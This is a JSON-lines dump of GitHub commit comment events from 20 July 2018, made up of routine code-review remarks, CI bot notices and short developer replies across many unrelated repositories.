{"id":"7996496649","type":"CommitCommentEvent","actor":{"login":"ggfan"},"repo":{"name":"googlesamples/android-ndk"},"payload":{"comment":{"id":29782951,"position":null,"line":null,"path":null,"commit_id":"1500df89135d0937df86663d5d8eeef987dc057d","created_at":"2018-07-20T18:19:40Z","updated_at":"2018-07-20T18:19:40Z","author_association":"CONTRIBUTOR","body":"this is for https://github.com/googlesamples/android-ndk/issues/508"}},"created_at":"2018-07-20T18:19:40Z"}
{"id":"7996497495","type":"CommitCommentEvent","actor":{"login":"ahigley"},"repo":{"name":"ahigley/A-ruby-text-adventure"},"payload":{"comment":{"id":29782954,"position":null,"line":null,"path":null,"commit_id":"6c680810adb68e84909768af0a685d2849d4cd20","created_at":"2018-07-20T18:19:51Z","updated_at":"2018-07-20T18:19:51Z","author_association":"OWNER","body":"another test"}},"created_at":"2018-07-20T18:19:51Z"}
{"id":"7996498150","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29782956,"position":126,"line":170,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T18:20:00Z","updated_at":"2018-07-20T18:20:00Z","author_association":"OWNER","body":"When inviting that's not so much of an issue. Later when the inviter will reveal the plaintextMove, it will be detected:\r\n\r\n   `function revealMove(Move plaintextMoveInviter, string password, bytes32 id)\r\n        onlyWhenActive \r\n        onlyWhenNotfinished(id)\r\n        onlyWhenPlayerIsInviter(id)\r\n        onlyWhenValidMove(plaintextMoveInviter) public {`"}},"created_at":"2018-07-20T18:20:00Z"}
{"id":"7996499171","type":"CommitCommentEvent","actor":{"login":"vnardozz"},"repo":{"name":"vnardozz/ScraperSite"},"payload":{"comment":{"id":29782959,"position":null,"line":null,"path":null,"commit_id":"fb72531b42f3a64d39e3899a4e4e4d5646a85ed9","created_at":"2018-07-20T18:20:13Z","updated_at":"2018-07-20T18:20:13Z","author_association":"OWNER","body":"added delete img"}},"created_at":"2018-07-20T18:20:13Z"}
{"id":"7996500824","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29782962,"position":59,"line":179,"path":"main/src/addins/MonoDevelop.UnitTesting/Services/UnitTestService.cs","commit_id":"71b9ea7bd1893ccbbaf313406009e6b20701b67a","created_at":"2018-07-20T18:20:33Z","updated_at":"2018-07-20T18:20:33Z","author_association":"MEMBER","body":"This causes a Stackoverflow..."}},"created_at":"2018-07-20T18:20:33Z"}
{"id":"7996500933","type":"CommitCommentEvent","actor":{"login":"Etothepowerof26"},"repo":{"name":"Zeni44/underdone"},"payload":{"comment":{"id":29782963,"position":null,"line":null,"path":null,"commit_id":"72345cf11c45c248a0394e33f76afbec6f45836e","created_at":"2018-07-20T18:20:34Z","updated_at":"2018-07-20T18:20:34Z","author_association":"COLLABORATOR","body":"gamemode/init.lua now has all net messages needed to be added"}},"created_at":"2018-07-20T18:20:34Z"}
{"id":"7996505127","type":"CommitCommentEvent","actor":{"login":"G2PCraft"},"repo":{"name":"xxxWILL-INFxxx/BedWars"},"payload":{"comment":{"id":29782974,"position":null,"line":null,"path":null,"commit_id":"f3219112801ec2cbbd80867079a05a60c9005cd8","created_at":"2018-07-20T18:21:28Z","updated_at":"2018-07-20T18:21:28Z","author_association":"NONE","body":"`$player->getLevel()`?"}},"created_at":"2018-07-20T18:21:28Z"}
{"id":"7996505926","type":"CommitCommentEvent","actor":{"login":"va3emt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29782978,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-20T18:21:38Z","updated_at":"2018-07-20T18:21:38Z","author_association":"NONE","body":"Thanx Andy, I just used DF2ET's tool and set it up that way to try. Didn't get me extra range, not even a bit. AGC auto is likely A1.\r\n\r\nMark"}},"created_at":"2018-07-20T18:21:38Z"}
{"id":"7996506835","type":"CommitCommentEvent","actor":{"login":"iceman1001"},"repo":{"name":"j8048188/proxmark3"},"payload":{"comment":{"id":29782986,"position":null,"line":null,"path":null,"commit_id":"2a5ffca9c588baca1187756dba541079796e8820","created_at":"2018-07-20T18:21:52Z","updated_at":"2018-07-20T18:21:52Z","author_association":"NONE","body":"make pull request?"}},"created_at":"2018-07-20T18:21:52Z"}
{"id":"7996512808","type":"CommitCommentEvent","actor":{"login":"krzemin"},"repo":{"name":"krzemin/octopus"},"payload":{"comment":{"id":29782999,"position":8,"line":13,"path":"octopus/src/test/scala/octopus/AsyncValidationSpec.scala","commit_id":"13b4cc2861a5f115160c32135938666f27e6ed34","created_at":"2018-07-20T18:23:06Z","updated_at":"2018-07-20T18:23:06Z","author_association":"OWNER","body":"Why not ToFutureOps or ToFutureSyntax?"}},"created_at":"2018-07-20T18:23:06Z"}
{"id":"7996515699","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783008,"position":null,"line":null,"path":null,"commit_id":"b0b5e44353f330de300631b30c197eadf55b71ca","created_at":"2018-07-20T18:23:44Z","updated_at":"2018-07-20T18:23:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-857](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-857).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-857-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T18:23:44Z"}
{"id":"7996547353","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"bakaphp/mail"},"payload":{"comment":{"id":29783075,"position":37,"line":113,"path":"src/JobTrait.php","commit_id":"fac0115bcbb619b093ec089ef738dc3328160615","created_at":"2018-07-20T18:30:31Z","updated_at":"2018-07-20T18:30:31Z","author_association":"NONE","body":"@gabbanaesteban What do you thing about:\r\n```diff\r\n- echo \"\\nYou have to define a queue name.\\n\\n\";\r\n+ fwrite(STDERR, \"You have to define a queue name.\\n\");\r\n```"}},"created_at":"2018-07-20T18:30:31Z"}
{"id":"7996547601","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29783076,"position":130,"line":173,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T18:30:34Z","updated_at":"2018-07-20T18:30:34Z","author_association":"OWNER","body":"True, but I did that to give back a more decent message back to the user. I guess it's all about gas!"}},"created_at":"2018-07-20T18:30:34Z"}
{"id":"7996552430","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29783087,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T18:31:34Z","updated_at":"2018-07-20T18:31:34Z","author_association":"COLLABORATOR","body":"Another thing,, if I'm looking correctly - the code is built with -static. It's not a supported option with sanitizers."}},"created_at":"2018-07-20T18:31:34Z"}
{"id":"7996552712","type":"CommitCommentEvent","actor":{"login":"EricMason24"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29783089,"position":21,"line":28,"path":"src/components/HomeOverlay.vue","commit_id":"bfbae3df7d53fc19b3e8f51115db53ba6c785ab3","created_at":"2018-07-20T18:31:38Z","updated_at":"2018-07-20T18:31:38Z","author_association":"COLLABORATOR","body":"this is here to make vue rerender because when you exit the login modal, it will automatically rerender the page with the different elements, because before you would have to refresh the page in order to see the different render -- I attempted to add a watcher onto a bool to change what elements render, but this did not work. This could also probably be done in vuex, but I tried to avoid that. "}},"created_at":"2018-07-20T18:31:38Z"}
{"id":"7996556661","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"mkiser/WTFJHT"},"payload":{"comment":{"id":29783098,"position":36,"line":36,"path":"_posts/2018-07-20-day-547.markdown","commit_id":"f30827cb3d1c7a9236818405bb8821456194a8d9","created_at":"2018-07-20T18:32:28Z","updated_at":"2018-07-20T18:32:28Z","author_association":"CONTRIBUTOR","body":"love this idea. \r\n\r\nDistill upon distill...\r\ncould see 'Month in Review' too. "}},"created_at":"2018-07-20T18:32:28Z"}
{"id":"7996557281","type":"CommitCommentEvent","actor":{"login":"lukeed"},"repo":{"name":"lukeed/kleur"},"payload":{"comment":{"id":29783100,"position":19,"line":15,"path":"foo.js","commit_id":"8cce02db6358b2a76d7c4c57e7343dc686c41d20","created_at":"2018-07-20T18:32:36Z","updated_at":"2018-07-20T18:32:36Z","author_association":"OWNER","body":"just in case... timestamp"}},"created_at":"2018-07-20T18:32:36Z"}
{"id":"7996558731","type":"CommitCommentEvent","actor":{"login":"HossamSamir"},"repo":{"name":"quran/quran.com-frontend"},"payload":{"comment":{"id":29783107,"position":null,"line":null,"path":null,"commit_id":"e453234c7743d49631fe0e70975cf3a674d8c32c","created_at":"2018-07-20T18:32:54Z","updated_at":"2018-07-20T18:32:54Z","author_association":"NONE","body":"🎉"}},"created_at":"2018-07-20T18:32:54Z"}
{"id":"7996559229","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783110,"position":null,"line":null,"path":null,"commit_id":"273e205d85c9ca1488379ba6c3550d26ee6591a5","created_at":"2018-07-20T18:33:01Z","updated_at":"2018-07-20T18:33:01Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-859](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-859).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-859-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T18:33:01Z"}
{"id":"7996572727","type":"CommitCommentEvent","actor":{"login":"Irinadoliov"},"repo":{"name":"SparkPost/support-docs"},"payload":{"comment":{"id":29783143,"position":null,"line":null,"path":null,"commit_id":"8b697a2ac0c339be78373db2e4f19748b91381b2","created_at":"2018-07-20T18:36:01Z","updated_at":"2018-07-20T18:36:01Z","author_association":"COLLABORATOR","body":"Awesome. Thanks."}},"created_at":"2018-07-20T18:36:01Z"}
{"id":"7996573838","type":"CommitCommentEvent","actor":{"login":"StevenOrn"},"repo":{"name":"StevenOrn/13_web_scraping"},"payload":{"comment":{"id":29783148,"position":null,"line":null,"path":null,"commit_id":"c550bdd3500a456b8109b74dc2e265d4d2cb803f","created_at":"2018-07-20T18:36:16Z","updated_at":"2018-07-20T18:36:16Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-20T18:36:16Z"}
{"id":"7996574853","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29783152,"position":null,"line":null,"path":null,"commit_id":"19f272fed3ddba8c750c361f9f7dd84791a917fe","created_at":"2018-07-20T18:36:29Z","updated_at":"2018-07-20T18:36:29Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [d8composer](https://d8composer-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/drupal-8-composer-no-ci](https://d8composer-static-docs.pantheonsite.io/docs/guides/drupal-8-composer-no-ci)\n- [/docs/core-updates](https://d8composer-static-docs.pantheonsite.io/docs/core-updates)\n"}},"created_at":"2018-07-20T18:36:29Z"}
{"id":"7996579311","type":"CommitCommentEvent","actor":{"login":"mdlpstsci"},"repo":{"name":"mdlpstsci/hstcal"},"payload":{"comment":{"id":29783157,"position":null,"line":null,"path":null,"commit_id":"ac01de955be7a54457dd0731e382b13e06b1c323","created_at":"2018-07-20T18:37:28Z","updated_at":"2018-07-20T18:37:28Z","author_association":"OWNER","body":"Nate's comments address PR#315 for Issue#314.\r\n\r\n"}},"created_at":"2018-07-20T18:37:28Z"}
{"id":"7996580411","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783158,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:37:44Z","updated_at":"2018-07-20T18:37:44Z","author_association":"CONTRIBUTOR","body":"done?? I don't see a change (at least for the mirgation)"}},"created_at":"2018-07-20T18:37:44Z"}
{"id":"7996582378","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29783163,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-20T18:38:10Z","updated_at":"2018-07-20T18:38:10Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-20T18:38:10Z"}
{"id":"7996583339","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29783164,"position":269,"line":378,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T18:38:23Z","updated_at":"2018-07-20T18:38:23Z","author_association":"OWNER","body":"yeah, but that's ok, the biggest error is that I skipped the test case because of laziness! "}},"created_at":"2018-07-20T18:38:23Z"}
{"id":"7996586064","type":"CommitCommentEvent","actor":{"login":"Lidocian"},"repo":{"name":"Lidocian/OnebotS"},"payload":{"comment":{"id":29783169,"position":null,"line":null,"path":null,"commit_id":"bc0cc288593ce426702472a92ce30da8a2ac8f2a","created_at":"2018-07-20T18:38:59Z","updated_at":"2018-07-20T18:38:59Z","author_association":"OWNER","body":"its seems ok now"}},"created_at":"2018-07-20T18:38:59Z"}
{"id":"7996586165","type":"CommitCommentEvent","actor":{"login":"paulwedeck"},"repo":{"name":"jsettlers/settlers-remake"},"payload":{"comment":{"id":29783170,"position":25,"line":32,"path":"go.graphics.swing/src/main/java/go/graphics/swing/opengl/LWJGLDebugOutput.java","commit_id":"7bcaf6127089337705e5d267df5cdfa8b05c4305","created_at":"2018-07-20T18:39:00Z","updated_at":"2018-07-20T18:39:00Z","author_association":"CONTRIBUTOR","body":"This value is completely arbitrary. It just shouldnt be to low or high."}},"created_at":"2018-07-20T18:39:00Z"}
{"id":"7996587348","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29783172,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-20T18:39:14Z","updated_at":"2018-07-20T18:39:14Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-20T18:39:14Z"}
{"id":"7996590947","type":"CommitCommentEvent","actor":{"login":"andreas-eberle"},"repo":{"name":"jsettlers/settlers-remake"},"payload":{"comment":{"id":29783190,"position":25,"line":32,"path":"go.graphics.swing/src/main/java/go/graphics/swing/opengl/LWJGLDebugOutput.java","commit_id":"7bcaf6127089337705e5d267df5cdfa8b05c4305","created_at":"2018-07-20T18:39:57Z","updated_at":"2018-07-20T18:39:57Z","author_association":"MEMBER","body":"Then if you want to have an int, you should write an int there. It makes no sense to write a double just to cast it."}},"created_at":"2018-07-20T18:39:57Z"}
{"id":"7996592585","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783194,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:40:18Z","updated_at":"2018-07-20T18:40:18Z","author_association":"NONE","body":"https://github.com/freifunk-berlin/firmware-packages/commit/9079518bbeadb91c75e807fe38e61e2f49987662"}},"created_at":"2018-07-20T18:40:18Z"}
{"id":"7996595689","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29783200,"position":5,"line":1234,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"eb68e7196cfc4cf42ee40e5356841e68df755823","created_at":"2018-07-20T18:40:58Z","updated_at":"2018-07-20T18:40:58Z","author_association":"COLLABORATOR","body":"It's usage is mostly poetic in Uyghur too, so I think we shouldn't transform it to gibi."}},"created_at":"2018-07-20T18:40:58Z"}
{"id":"7996602709","type":"CommitCommentEvent","actor":{"login":"mkiser"},"repo":{"name":"mkiser/WTFJHT"},"payload":{"comment":{"id":29783214,"position":36,"line":36,"path":"_posts/2018-07-20-day-547.markdown","commit_id":"f30827cb3d1c7a9236818405bb8821456194a8d9","created_at":"2018-07-20T18:42:32Z","updated_at":"2018-07-20T18:42:32Z","author_association":"OWNER","body":"Absolutely. This worked out well because Politico wrote a perfect capsule review of the week. \r\n\r\nI've long wanted to do something like this. The \"today in one sentence\" summary in the newsletter is a first stab and playing with that voice/tone."}},"created_at":"2018-07-20T18:42:32Z"}
{"id":"7996605243","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783220,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:43:08Z","updated_at":"2018-07-20T18:43:08Z","author_association":"CONTRIBUTOR","body":"IMHO you made to many branches which all deal the same issue. I lost the track of them.\r\n\r\nso can this PR be closed?"}},"created_at":"2018-07-20T18:43:08Z"}
{"id":"7996607481","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29783230,"position":null,"line":null,"path":null,"commit_id":"fec27aa7cf5ca615266e419e2181db3abe7c9005","created_at":"2018-07-20T18:43:39Z","updated_at":"2018-07-20T18:43:39Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/fec27aa7cf5ca615266e419e2181db3abe7c9005/index.html"}},"created_at":"2018-07-20T18:43:39Z"}
{"id":"7996612339","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29783245,"position":null,"line":null,"path":null,"commit_id":"ed13a0dc8a8ba61ca49c7f6dc438719727fce1c0","created_at":"2018-07-20T18:44:46Z","updated_at":"2018-07-20T18:44:46Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-852](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-852).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-852-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T18:44:46Z"}
{"id":"7996613707","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783248,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:45:05Z","updated_at":"2018-07-20T18:45:05Z","author_association":"NONE","body":"It can be closed if the changes are merged or rejected."}},"created_at":"2018-07-20T18:45:05Z"}
{"id":"7996615515","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783254,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:45:28Z","updated_at":"2018-07-20T18:45:28Z","author_association":"CONTRIBUTOR","body":"btw. is there any PR open ?"}},"created_at":"2018-07-20T18:45:28Z"}
{"id":"7996618503","type":"CommitCommentEvent","actor":{"login":"Nicolas-Rieu"},"repo":{"name":"Nicolas-Rieu/maven-project"},"payload":{"comment":{"id":29783264,"position":null,"line":null,"path":null,"commit_id":"54308e303c193ee69fd6175be2ff87d7d979025e","created_at":"2018-07-20T18:46:08Z","updated_at":"2018-07-20T18:46:08Z","author_association":"OWNER","body":"useless"}},"created_at":"2018-07-20T18:46:08Z"}
{"id":"7996619315","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783270,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:46:19Z","updated_at":"2018-07-20T18:46:19Z","author_association":"NONE","body":"No, I guess not.  I'll make one right away"}},"created_at":"2018-07-20T18:46:19Z"}
{"id":"7996637140","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29783303,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-20T18:50:13Z","updated_at":"2018-07-20T18:50:13Z","author_association":"OWNER","body":"Try this one\r\n```\r\ndiff --git a/app/Watcher.php b/app/Watcher.php\r\nindex 6c88f67..a7fe9b0 100644\r\n--- a/app/Watcher.php\r\n+++ b/app/Watcher.php\r\n@@ -101,6 +101,9 @@ final class Watcher\r\n \r\n     public function __construct()\r\n     {\r\n+\t\tif (PHP_OS !== 'Linux')\r\n+\t\t\treturn;\r\n+\r\n         $this->fd = inotify_init();\r\n         if ($this->fd === false)\r\n             dd('Unable to initialize main inotify descriptor.');\r\n@@ -117,6 +120,9 @@ final class Watcher\r\n \r\n     protected function trackEx($path, $isDirectory, $parentWd, $data = [], $recursive = false)\r\n     {\r\n+\t\tif (PHP_OS !== 'Linux')\r\n+\t\t\treturn false;\r\n+\r\n         if (file_exists($path) === false)\r\n             return false;\r\n \r\n@@ -256,6 +262,9 @@ final class Watcher\r\n \r\n     public function go($once = false)\r\n     {\r\n+\t\tif (PHP_OS !== 'Linux')\r\n+\t\t\treturn;\r\n+\r\n         while (true) {\r\n             $events = inotify_read($this->fd);\r\n             // keep polling for events if there are none\r\n\r\n```"}},"created_at":"2018-07-20T18:50:13Z"}
{"id":"7996638940","type":"CommitCommentEvent","actor":{"login":"feccruz"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29783310,"position":null,"line":null,"path":null,"commit_id":"c559077007237300a4c4509636631714f766a7e4","created_at":"2018-07-20T18:50:38Z","updated_at":"2018-07-20T18:50:38Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-20T18:50:38Z"}
{"id":"7996639424","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29783312,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-20T18:50:45Z","updated_at":"2018-07-20T18:50:45Z","author_association":"NONE","body":"pr #135 "}},"created_at":"2018-07-20T18:50:45Z"}
{"id":"7996640678","type":"CommitCommentEvent","actor":{"login":"feccruz"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29783317,"position":null,"line":null,"path":null,"commit_id":"c559077007237300a4c4509636631714f766a7e4","created_at":"2018-07-20T18:51:02Z","updated_at":"2018-07-20T18:51:02Z","author_association":"NONE","body":"![feccruzft](https://user-images.githubusercontent.com/1163866/43019881-4f6519e4-8c2c-11e8-9533-47e0e66ef799.png)\r\n"}},"created_at":"2018-07-20T18:51:02Z"}
{"id":"7996643248","type":"CommitCommentEvent","actor":{"login":"balupton"},"repo":{"name":"bolivier/dotfiles"},"payload":{"comment":{"id":29783329,"position":null,"line":null,"path":null,"commit_id":"4d3eb3ecbc93f7194b29898ef8256f83f155ee2c","created_at":"2018-07-20T18:51:36Z","updated_at":"2018-07-20T18:51:36Z","author_association":"NONE","body":"You might be interested in the new user support in my dotfiles, allowing you to fork then put all your custom stuff in .scripts/users/username or something like that"}},"created_at":"2018-07-20T18:51:36Z"}
{"id":"7996647289","type":"CommitCommentEvent","actor":{"login":"rycee"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29783336,"position":116,"line":116,"path":"modules/misc/nixpkgs.nix","commit_id":"7417d8e86e9b1bfa47482f29604315f5ec2696bf","created_at":"2018-07-20T18:52:28Z","updated_at":"2018-07-20T18:52:28Z","author_association":"OWNER","body":"No worries, hope it works better now 🙂"}},"created_at":"2018-07-20T18:52:28Z"}
{"id":"7996647804","type":"CommitCommentEvent","actor":{"login":"ozaslan"},"repo":{"name":"KumarRobotics/camera_base"},"payload":{"comment":{"id":29783337,"position":null,"line":null,"path":null,"commit_id":"d72304898a6412cb77d8dce5597bb5e51a09feb1","created_at":"2018-07-20T18:52:35Z","updated_at":"2018-07-20T18:52:35Z","author_association":"CONTRIBUTOR","body":"@versatran01 isn't this common to all camera classes that inherits CameraNodeBase? "}},"created_at":"2018-07-20T18:52:35Z"}
{"id":"7996651181","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29783344,"position":159,"line":191,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T18:53:22Z","updated_at":"2018-07-20T18:53:22Z","author_association":"OWNER","body":"Why not ?\r\nAccording to the requirement that is put in commentary above the function, it will perform just that: The invitee can always cancel, and the inviter can only cancel until the moment that invitee has accepted the game (provided the plainitext move). Only these two players can cancel the game (onlyWhenPlayer)"}},"created_at":"2018-07-20T18:53:22Z"}
{"id":"7996651366","type":"CommitCommentEvent","actor":{"login":"ipekgrgc"},"repo":{"name":"ipekgrgc/bootstrap"},"payload":{"comment":{"id":29783345,"position":null,"line":null,"path":null,"commit_id":"13682a166aed2a393f27dd9094d83065e9c7c175","created_at":"2018-07-20T18:53:25Z","updated_at":"2018-07-20T18:53:25Z","author_association":"OWNER","body":"6 da ufak eksikler var, 7'yi çevirmedim"}},"created_at":"2018-07-20T18:53:25Z"}
{"id":"7996651928","type":"CommitCommentEvent","actor":{"login":"frogg"},"repo":{"name":"OasysFoundation/Oasys-Toolbox-React"},"payload":{"comment":{"id":29783348,"position":null,"line":null,"path":null,"commit_id":"107000412cc82b68b756f7ebe2eced8f6786489d","created_at":"2018-07-20T18:53:33Z","updated_at":"2018-07-20T18:53:33Z","author_association":"MEMBER","body":"Are you sure that this color was necessary. For me it worked before as well. "}},"created_at":"2018-07-20T18:53:33Z"}
{"id":"7996652520","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783350,"position":null,"line":null,"path":null,"commit_id":"ed0d0a144f6cf4dbf402c960daf83bb3a4b47715","created_at":"2018-07-20T18:53:41Z","updated_at":"2018-07-20T18:53:41Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-860](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-860).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-860-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T18:53:41Z"}
{"id":"7996653581","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"openfaas/faas-cli"},"payload":{"comment":{"id":29783354,"position":36,"line":87,"path":"commands/deploy.go","commit_id":"1c6ef8226903d4375b41d02cbe4f32516bb0eaa9","created_at":"2018-07-20T18:53:56Z","updated_at":"2018-07-20T18:53:56Z","author_association":"MEMBER","body":"Conflicted on this. It's super verbose. --readonly ? "}},"created_at":"2018-07-20T18:53:56Z"}
{"id":"7996669267","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"SubZero7748/android_kernel_samsung_grandppltedx"},"payload":{"comment":{"id":29783384,"position":null,"line":null,"path":null,"commit_id":"5ae91427377c7c2708c0d11913e6a18ff4398deb","created_at":"2018-07-20T18:57:21Z","updated_at":"2018-07-20T18:57:21Z","author_association":"NONE","body":"Mchuiii"}},"created_at":"2018-07-20T18:57:21Z"}
